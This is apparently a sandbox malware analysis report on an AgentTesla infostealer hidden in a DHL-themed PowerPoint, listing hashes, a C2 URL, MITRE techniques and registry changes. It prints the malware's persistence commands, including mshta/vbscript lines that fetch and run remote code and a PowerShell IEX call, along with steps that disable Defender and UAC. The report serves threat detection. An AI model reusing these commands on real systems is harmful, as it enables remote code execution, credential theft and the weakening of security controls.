agenttesla | f62126148a3e6cc7bc2662a8d3b4def7ba95af74265b8f13c2abf6254ea8f0f7

Analysis

max time kernel
150s
max time network
146s
platform
windows7_x64
resource
win7v20201028
submitted
11-03-2021 20:00

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

DHL#AWB031121.ppt
Size

121KB
MD5

49c5e5cf4fec6d41cf03e25995e664d4
SHA1

d8bfbe0acf50553ddd7a8bb4160ebf3f163e608a
SHA256

f62126148a3e6cc7bc2662a8d3b4def7ba95af74265b8f13c2abf6254ea8f0f7
SHA512

6e2f2d9977b6666209d984be665dffa0fb6a13aee7814a4727eaf4eeb66d0017dcffcfac2ae8ba4679bf70b0c0f3ef2ea5640f12619959dcf114851bb25946a9

Score

10^/10

agenttesla evasion keylogger persistence spyware stealer trojan

Malware Config

Extracted

Family

agenttesla

http://193.56.28.231/webpanel-ice/inc/8a33becdbb4cb1.php

Signatures

AgentTesla
Agent Tesla is a remote access tool (RAT) written in visual basic.
keylogger trojan stealer spyware agenttesla

Contains code to disable Windows Defender 1 IoCs

A .NET executable tasked with disabling Windows Defender capabilities such as realtime monitoring, blocking at first seen, etc.

Processes:

resource	yara_rule
C:\Users\Public\bin.vbs	disable_win_def

Modifies Windows Defender Real-time Protection settings 3 TTPs
evasion trojan

Modify Registry
T1112

Modify Existing Service
T1031

Disabling Security Tools
T1089

Process spawned unexpected child process 14 IoCs

This typically indicates the parent process was compromised via an exploit or macro.

Processes:

mshta.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exe

description	pid	pid_target	process	target process
Parent C:\Program Files (x86)\Microsoft Office\Office14\POWERPNT.EXE is not expected to spawn this process	900	1100	mshta.exe	POWERPNT.EXE
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	1996	1200	powershell.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	1104	1200	powershell.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	1608	1200	powershell.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	1172	1200	powershell.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2132	1200	powershell.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2260	1200	powershell.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2392	1200	powershell.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2628	1200	powershell.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2800	1200	powershell.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2980	1200	powershell.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2084	1200	powershell.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2356	1200	powershell.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	960	1200	powershell.exe

UAC bypass 3 TTPs
evasion trojan

Bypass User Account Control
T1088

Disabling Security Tools
T1089

Modify Registry
T1112

AgentTesla Payload 3 IoCs

Processes:

resource	yara_rule
behavioral1/memory/2656-130-0x0000000000400000-0x000000000043C000-memory.dmp	family_agenttesla
behavioral1/memory/2656-131-0x00000000004376DE-mapping.dmp	family_agenttesla
behavioral1/memory/2656-166-0x0000000000400000-0x000000000043C000-memory.dmp	family_agenttesla

Blocklisted process makes network request 16 IoCs

Processes:

mshta.exeWScript.exepowershell.exe

flow	pid	process
7	900	mshta.exe
9	900	mshta.exe
11	900	mshta.exe
13	900	mshta.exe
14	900	mshta.exe
16	900	mshta.exe
17	900	mshta.exe
19	900	mshta.exe
23	900	mshta.exe
24	900	mshta.exe
25	900	mshta.exe
26	900	mshta.exe
29	1096	WScript.exe
31	1096	WScript.exe
33	1096	WScript.exe
36	1996	powershell.exe

Drops file in Drivers directory 1 IoCs

Processes:

aspnet_compiler.exe

description ioc process

File opened for modification C:\Windows\system32\drivers\etc\hosts aspnet_compiler.exe

description	ioc	process
File opened for modification	C:\Windows\system32\drivers\etc\hosts	aspnet_compiler.exe

Adds Run key to start application 2 TTPs 5 IoCs

persistence

Registry Run Keys / Startup Folder

T1060

Modify Registry

T1112

Processes:

mshta.exe

description	ioc	process
Key created	\REGISTRY\USER\S-1-5-21-3825035466-2522850611-591511364-1000\Software\Microsoft\Windows\CurrentVersion\Run	mshta.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3825035466-2522850611-591511364-1000\Software\Microsoft\Windows\CurrentVersion\Run\phulihoja = "mshta vbscript:Execute(\"CreateObject(\"\"Wscript.Shell\"\").Run \"\"powershell ((gp HKCU:\\Software).cutona)\|IEX\"\", 0 : window.close\")"	mshta.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3825035466-2522850611-591511364-1000\Software\Microsoft\Windows\CurrentVersion\Run\dkkkksakdosexography = "mshta vbscript:Execute(\"CreateObject(\"\"Wscript.Shell\"\").Run \"\"mshta http://1230948%[email protected]/p/icenewback1111.html\"\", 0 : window.close\")"	mshta.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3825035466-2522850611-591511364-1000\Software\Microsoft\Windows\CurrentVersion\Run\ = "mshta vbscript:Execute(\"CreateObject(\"\"Wscript.Shell\"\").Run \"\"mshta http://1230948%[email protected]/p/backbone15.html\"\", 0 : window.close\")"	mshta.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3825035466-2522850611-591511364-1000\Software\Microsoft\Windows\CurrentVersion\Run\nunukhaoo = "mshta vbscript:Execute(\"CreateObject(\"\"Wscript.Shell\"\").Run \"\"mshta http://1230948%[email protected]/p/ghostbackup14.html\"\", 0 : window.close\")"	mshta.exe

Checks whether UAC is enabled 1 TTPs 1 IoCs
evasion trojan

System Information Discovery
T1082

Processes:

WScript.exe

description ioc process

Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" WScript.exe

description	ioc	process
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	WScript.exe

Drops file in System32 directory 13 IoCs

Processes:

powershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exe

description	ioc	process
File opened for modification	C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.exe
File opened for modification	C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.exe
File opened for modification	C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.exe
File opened for modification	C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.exe
File opened for modification	C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.exe
File opened for modification	C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.exe
File opened for modification	C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.exe
File opened for modification	C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.exe
File opened for modification	C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.exe
File opened for modification	C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.exe
File opened for modification	C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.exe
File opened for modification	C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.exe
File opened for modification	C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.exe

Suspicious use of SetThreadContext 1 IoCs

Processes:

powershell.exe

description pid process target process

PID 1996 set thread context of 2656 1996 powershell.exe aspnet_compiler.exe
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082
Office loads VBA resources, possible macro or embedded object present
Creates scheduled task(s) 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
persistence

Scheduled Task
T1053

Processes:

schtasks.exe

pid process

1580 schtasks.exe

description	pid	process	target process
PID 1996 set thread context of 2656	1996	powershell.exe	aspnet_compiler.exe

pid	process
1580	schtasks.exe

Modifies Internet Explorer settings 1 TTPs 10 IoCs

adware spyware

Modify Registry

T1112

Processes:

POWERPNT.EXEmshta.exe

description	ioc	process
Key created	\REGISTRY\USER\S-1-5-21-3825035466-2522850611-591511364-1000\Software\Microsoft\Internet Explorer\MenuExt	POWERPNT.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-3825035466-2522850611-591511364-1000\Software\Microsoft\Internet Explorer\MenuExt\Se&nd to OneNote\ = "res://C:\\PROGRA~2\\MICROS~1\\Office14\\ONBttnIE.dll/105"	POWERPNT.EXE
Set value (int)	\REGISTRY\USER\S-1-5-21-3825035466-2522850611-591511364-1000\Software\Microsoft\Internet Explorer\MenuExt\Se&nd to OneNote\Contexts = "55"	POWERPNT.EXE
Key created	\REGISTRY\USER\S-1-5-21-3825035466-2522850611-591511364-1000\Software\Microsoft\Internet Explorer\MenuExt\E&xport to Microsoft Excel	POWERPNT.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-3825035466-2522850611-591511364-1000\Software\Microsoft\Internet Explorer\MenuExt\E&xport to Microsoft Excel\ = "res://C:\\PROGRA~2\\MICROS~1\\Office14\\EXCEL.EXE/3000"	POWERPNT.EXE
Set value (int)	\REGISTRY\USER\S-1-5-21-3825035466-2522850611-591511364-1000\Software\Microsoft\Internet Explorer\MenuExt\E&xport to Microsoft Excel\Contexts = "1"	POWERPNT.EXE
Key created	\REGISTRY\USER\S-1-5-21-3825035466-2522850611-591511364-1000\Software\Microsoft\Internet Explorer\Main	mshta.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3825035466-2522850611-591511364-1000\Software\Microsoft\Internet Explorer\Toolbar\ShowDiscussionButton = "Yes"	POWERPNT.EXE
Key created	\REGISTRY\USER\S-1-5-21-3825035466-2522850611-591511364-1000\Software\Microsoft\Internet Explorer\MenuExt\Se&nd to OneNote	POWERPNT.EXE
Key created	\REGISTRY\USER\S-1-5-21-3825035466-2522850611-591511364-1000\Software\Microsoft\Internet Explorer\Toolbar	POWERPNT.EXE

Modifies registry class 64 IoCs

Processes:

POWERPNT.EXE

description	ioc	process
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{91493450-5A91-11CF-8700-00AA0060263B}\TypeLib\ = "{91493440-5A91-11CF-8700-00AA0060263B}"	POWERPNT.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{91493452-5A91-11CF-8700-00AA0060263B}\TypeLib\Version = "2.a"	POWERPNT.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{91493474-5A91-11CF-8700-00AA0060263B}\ProxyStubClsid32\ = "{00020424-0000-0000-C000-000000000046}"	POWERPNT.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{91493483-5A91-11CF-8700-00AA0060263B}	POWERPNT.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{914934C9-5A91-11CF-8700-00AA0060263B}\TypeLib\ = "{91493440-5A91-11CF-8700-00AA0060263B}"	POWERPNT.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{914934F5-5A91-11CF-8700-00AA0060263B}\ProxyStubClsid32	POWERPNT.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{91493459-5A91-11CF-8700-00AA0060263B}\TypeLib\Version = "2.a"	POWERPNT.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{91493496-5A91-11CF-8700-00AA0060263B}\TypeLib	POWERPNT.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{914934E1-5A91-11CF-8700-00AA0060263B}\TypeLib	POWERPNT.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{914934E8-5A91-11CF-8700-00AA0060263B}\ProxyStubClsid32\ = "{00020424-0000-0000-C000-000000000046}"	POWERPNT.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{914934F6-5A91-11CF-8700-00AA0060263B}	POWERPNT.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{92D41A5C-F07E-4CA4-AF6F-BEF486AA4E6F}\TypeLib\Version = "2.a"	POWERPNT.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{BA72E558-4FF5-48F4-8215-5505F990966F}	POWERPNT.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{914934E4-5A91-11CF-8700-00AA0060263B}	POWERPNT.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{914934E7-5A91-11CF-8700-00AA0060263B}\ProxyStubClsid32\ = "{00020424-0000-0000-C000-000000000046}"	POWERPNT.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{914934EA-5A91-11CF-8700-00AA0060263B}	POWERPNT.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{92D41A71-F07E-4CA4-AF6F-BEF486AA4E6F}\TypeLib\ = "{91493440-5A91-11CF-8700-00AA0060263B}"	POWERPNT.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{914934E4-5A91-11CF-8700-00AA0060263B}\TypeLib\ = "{91493440-5A91-11CF-8700-00AA0060263B}"	POWERPNT.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{91493460-5A91-11CF-8700-00AA0060263B}\TypeLib	POWERPNT.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{91493479-5A91-11CF-8700-00AA0060263B}	POWERPNT.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{9149348A-5A91-11CF-8700-00AA0060263B}\ = "ObjectVerbs"	POWERPNT.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{914934F1-5A91-11CF-8700-00AA0060263B}\ProxyStubClsid32\ = "{00020424-0000-0000-C000-000000000046}"	POWERPNT.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{92D41A54-F07E-4CA4-AF6F-BEF486AA4E6F}\TypeLib	POWERPNT.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{9149347B-5A91-11CF-8700-00AA0060263B}\ = "GroupShapes"	POWERPNT.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{91493489-5A91-11CF-8700-00AA0060263B}\ = "LinkFormat"	POWERPNT.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{91493490-5A91-11CF-8700-00AA0060263B}\TypeLib	POWERPNT.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{92D41A70-F07E-4CA4-AF6F-BEF486AA4E6F}\TypeLib\Version = "2.a"	POWERPNT.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{91493487-5A91-11CF-8700-00AA0060263B}\ = "ShapeNode"	POWERPNT.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{914934D0-5A91-11CF-8700-00AA0060263B}\TypeLib\Version = "2.a"	POWERPNT.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{914934F1-5A91-11CF-8700-00AA0060263B}\ = "SetEffect"	POWERPNT.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{92D41A6D-F07E-4CA4-AF6F-BEF486AA4E6F}\ProxyStubClsid32\ = "{00020424-0000-0000-C000-000000000046}"	POWERPNT.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{91493471-5A91-11CF-8700-00AA0060263B}\ProxyStubClsid32\ = "{00020424-0000-0000-C000-000000000046}"	POWERPNT.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{91493485-5A91-11CF-8700-00AA0060263B}\ProxyStubClsid32\ = "{00020424-0000-0000-C000-000000000046}"	POWERPNT.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{914934DA-5A91-11CF-8700-00AA0060263B}\TypeLib\Version = "2.a"	POWERPNT.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{914934F0-5A91-11CF-8700-00AA0060263B}\ProxyStubClsid32	POWERPNT.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{92D41A66-F07E-4CA4-AF6F-BEF486AA4E6F}\TypeLib\ = "{91493440-5A91-11CF-8700-00AA0060263B}"	POWERPNT.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{BA72E557-4FF5-48F4-8215-5505F990966F}\TypeLib\ = "{91493440-5A91-11CF-8700-00AA0060263B}"	POWERPNT.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{914934F3-5A91-11CF-8700-00AA0060263B}\ = "CustomLayout"	POWERPNT.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{9149345C-5A91-11CF-8700-00AA0060263B}\ = "NamedSlideShow"	POWERPNT.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{9149345E-5A91-11CF-8700-00AA0060263B}\TypeLib\ = "{91493440-5A91-11CF-8700-00AA0060263B}"	POWERPNT.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{91493472-5A91-11CF-8700-00AA0060263B}\TypeLib\Version = "2.a"	POWERPNT.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{91493489-5A91-11CF-8700-00AA0060263B}\TypeLib\ = "{91493440-5A91-11CF-8700-00AA0060263B}"	POWERPNT.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{91493490-5A91-11CF-8700-00AA0060263B}\TypeLib\Version = "2.a"	POWERPNT.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{914934DB-5A91-11CF-8700-00AA0060263B}	POWERPNT.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{914934DE-5A91-11CF-8700-00AA0060263B}\TypeLib	POWERPNT.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{91493457-5A91-11CF-8700-00AA0060263B}\TypeLib\ = "{91493440-5A91-11CF-8700-00AA0060263B}"	POWERPNT.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{914934C9-5A91-11CF-8700-00AA0060263B}\ = "Cell"	POWERPNT.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{914934CE-5A91-11CF-8700-00AA0060263B}\TypeLib	POWERPNT.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{92D41A65-F07E-4CA4-AF6F-BEF486AA4E6F}\ProxyStubClsid32	POWERPNT.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{92D41A79-F07E-4CA4-AF6F-BEF486AA4E6F}\ProxyStubClsid32\ = "{00020424-0000-0000-C000-000000000046}"	POWERPNT.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{92D41A66-F07E-4CA4-AF6F-BEF486AA4E6F}\ProxyStubClsid32	POWERPNT.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{91493457-5A91-11CF-8700-00AA0060263B}\ProxyStubClsid32\ = "{00020424-0000-0000-C000-000000000046}"	POWERPNT.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{9149345E-5A91-11CF-8700-00AA0060263B}\ProxyStubClsid32\ = "{00020424-0000-0000-C000-000000000046}"	POWERPNT.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{91493466-5A91-11CF-8700-00AA0060263B}\ProxyStubClsid32	POWERPNT.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{91493492-5A91-11CF-8700-00AA0060263B}\TypeLib\Version = "2.a"	POWERPNT.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{91493496-5A91-11CF-8700-00AA0060263B}\ = "ParagraphFormat"	POWERPNT.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{914934E9-5A91-11CF-8700-00AA0060263B}\TypeLib\Version = "2.a"	POWERPNT.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{92D41A65-F07E-4CA4-AF6F-BEF486AA4E6F}	POWERPNT.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{92D41A74-F07E-4CA4-AF6F-BEF486AA4E6F}\TypeLib	POWERPNT.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{92D41A7B-F07E-4CA4-AF6F-BEF486AA4E6F}\ProxyStubClsid32\ = "{00020424-0000-0000-C000-000000000046}"	POWERPNT.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{91493442-5A91-11CF-8700-00AA0060263B}	POWERPNT.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{914934C7-5A91-11CF-8700-00AA0060263B}\TypeLib\Version = "2.a"	POWERPNT.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{914934D8-5A91-11CF-8700-00AA0060263B}\ProxyStubClsid32\ = "{00020424-0000-0000-C000-000000000046}"	POWERPNT.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{914934E1-5A91-11CF-8700-00AA0060263B}\ProxyStubClsid32	POWERPNT.EXE

Modifies system certificate store 2 TTPs 3 IoCs

evasion spyware trojan

Install Root Certificate

T1130

Modify Registry

T1112

Processes:

WScript.exe

description	ioc	process
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\2796BAE63F1801E277261BA0D77770028F20EEE4	WScript.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\2796BAE63F1801E277261BA0D77770028F20EEE4\Blob = 0f00000001000000140000005d82adb90d5dd3c7e3524f56f787ec53726187760b000000010000005200000047006f00200044006100640064007900200043006c00610073007300200032002000430065007200740069006600690063006100740069006f006e00200041007500740068006f007200690074007900000053000000010000004800000030463021060b6086480186fd6d0107170330123010060a2b0601040182373c0101030200c03021060b6086480186fd6e0107170330123010060a2b0601040182373c0101030200c009000000010000002a000000302806082b0601050507030106082b0601050507030206082b0601050507030406082b06010505070303140000000100000014000000d2c4b0d291d44c1171b361cb3da1fedda86ad4e31d000000010000001000000099949d2179811f6b30a8c99c4f6b42260300000001000000140000002796bae63f1801e277261ba0d77770028f20eee420000000010000000404000030820400308202e8a003020102020100300d06092a864886f70d01010505003063310b30090603550406130255533121301f060355040a131854686520476f2044616464792047726f75702c20496e632e3131302f060355040b1328476f20446164647920436c61737320322043657274696669636174696f6e20417574686f72697479301e170d3034303632393137303632305a170d3334303632393137303632305a3063310b30090603550406130255533121301f060355040a131854686520476f2044616464792047726f75702c20496e632e3131302f060355040b1328476f20446164647920436c61737320322043657274696669636174696f6e20417574686f7269747930820120300d06092a864886f70d01010105000382010d00308201080282010100de9dd7ea571849a15bebd75f4886eabeddffe4ef671cf46568b35771a05e77bbed9b49e970803d561863086fdaf2ccd03f7f0254225410d8b281d4c0753d4b7fc777c33e78ab1a03b5206b2f6a2bb1c5887ec4bb1eb0c1d845276faa3758f78726d7d82df6a917b71f72364ea6173f659892db2a6e5da2fe88e00bde7fe58d15e1ebcb3ad5e212a2132dd88eaf5f123da0080508b65ca565380445991ea3606074c541a572621b62c51f6f5f1a42be025165a8ae23186afc7803a94d7f80c3faab5afca140a4ca1916feb2c8ef5e730dee77bd9af67998bcb10767a2150ddda058c6447b0a3e62285fba41075358cf117e3874c5f8ffb569908f8474ea971baf020103a381c03081bd301d0603551d0e04160414d2c4b0d291d44c1171b361cb3da1fedda86ad4e330818d0603551d230481853081828014d2c4b0d291d44c1171b361cb3da1fedda86ad4e3a167a4653063310b30090603550406130255533121301f060355040a131854686520476f2044616464792047726f75702c20496e632e3131302f060355040b1328476f20446164647920436c61737320322043657274696669636174696f6e20417574686f72697479820100300c0603551d13040530030101ff300d06092a864886f70d01010505000382010100324bf3b2ca3e91fc12c6a1078c8e77a03306145c901e18f708a63d0a19f98780116e69e4961730ff3491637238eecc1c01a31d9428a431f67ac454d7f6e5315803a2ccce62db944573b5bf45c924b5d58202ad2379698db8b64dcecf4cca3323e81c88aa9d8b416e16c920e5899ecd3bda70f77e992620145425ab6e7385e69b219d0a6c820ea8f8c20cfa101e6c96ef870dc40f618badee832b95f88e92847239eb20ea83ed83cd976e08bceb4e26b6732be4d3f64cfe2671e26111744aff571a870f75482ecf516917a002126195d5d140b2104ceec4ac1043a6a59e0ad595629a0dcf8882c5320ce42b9f45e60d9f289cb1b92a5a57ad370faf1d7fdbbd9f	WScript.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\2796BAE63F1801E277261BA0D77770028F20EEE4\Blob = 19000000010000001000000063664b080559a094d10f0a3c5f4f62900300000001000000140000002796bae63f1801e277261ba0d77770028f20eee41d000000010000001000000099949d2179811f6b30a8c99c4f6b4226140000000100000014000000d2c4b0d291d44c1171b361cb3da1fedda86ad4e309000000010000002a000000302806082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030353000000010000004800000030463021060b6086480186fd6d0107170330123010060a2b0601040182373c0101030200c03021060b6086480186fd6e0107170330123010060a2b0601040182373c0101030200c00b000000010000005200000047006f00200044006100640064007900200043006c00610073007300200032002000430065007200740069006600690063006100740069006f006e00200041007500740068006f00720069007400790000000f00000001000000140000005d82adb90d5dd3c7e3524f56f787ec537261877620000000010000000404000030820400308202e8a003020102020100300d06092a864886f70d01010505003063310b30090603550406130255533121301f060355040a131854686520476f2044616464792047726f75702c20496e632e3131302f060355040b1328476f20446164647920436c61737320322043657274696669636174696f6e20417574686f72697479301e170d3034303632393137303632305a170d3334303632393137303632305a3063310b30090603550406130255533121301f060355040a131854686520476f2044616464792047726f75702c20496e632e3131302f060355040b1328476f20446164647920436c61737320322043657274696669636174696f6e20417574686f7269747930820120300d06092a864886f70d01010105000382010d00308201080282010100de9dd7ea571849a15bebd75f4886eabeddffe4ef671cf46568b35771a05e77bbed9b49e970803d561863086fdaf2ccd03f7f0254225410d8b281d4c0753d4b7fc777c33e78ab1a03b5206b2f6a2bb1c5887ec4bb1eb0c1d845276faa3758f78726d7d82df6a917b71f72364ea6173f659892db2a6e5da2fe88e00bde7fe58d15e1ebcb3ad5e212a2132dd88eaf5f123da0080508b65ca565380445991ea3606074c541a572621b62c51f6f5f1a42be025165a8ae23186afc7803a94d7f80c3faab5afca140a4ca1916feb2c8ef5e730dee77bd9af67998bcb10767a2150ddda058c6447b0a3e62285fba41075358cf117e3874c5f8ffb569908f8474ea971baf020103a381c03081bd301d0603551d0e04160414d2c4b0d291d44c1171b361cb3da1fedda86ad4e330818d0603551d230481853081828014d2c4b0d291d44c1171b361cb3da1fedda86ad4e3a167a4653063310b30090603550406130255533121301f060355040a131854686520476f2044616464792047726f75702c20496e632e3131302f060355040b1328476f20446164647920436c61737320322043657274696669636174696f6e20417574686f72697479820100300c0603551d13040530030101ff300d06092a864886f70d01010505000382010100324bf3b2ca3e91fc12c6a1078c8e77a03306145c901e18f708a63d0a19f98780116e69e4961730ff3491637238eecc1c01a31d9428a431f67ac454d7f6e5315803a2ccce62db944573b5bf45c924b5d58202ad2379698db8b64dcecf4cca3323e81c88aa9d8b416e16c920e5899ecd3bda70f77e992620145425ab6e7385e69b219d0a6c820ea8f8c20cfa101e6c96ef870dc40f618badee832b95f88e92847239eb20ea83ed83cd976e08bceb4e26b6732be4d3f64cfe2671e26111744aff571a870f75482ecf516917a002126195d5d140b2104ceec4ac1043a6a59e0ad595629a0dcf8882c5320ce42b9f45e60d9f289cb1b92a5a57ad370faf1d7fdbbd9f	WScript.exe

Suspicious behavior: AddClipboardFormatListener 1 IoCs

Processes:

POWERPNT.EXE

pid process

1100 POWERPNT.EXE

pid	process
1100	POWERPNT.EXE

Suspicious behavior: EnumeratesProcesses 36 IoCs

Processes:

powershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exeaspnet_compiler.exepowershell.exepowershell.exepowershell.exepowershell.exe

pid	process
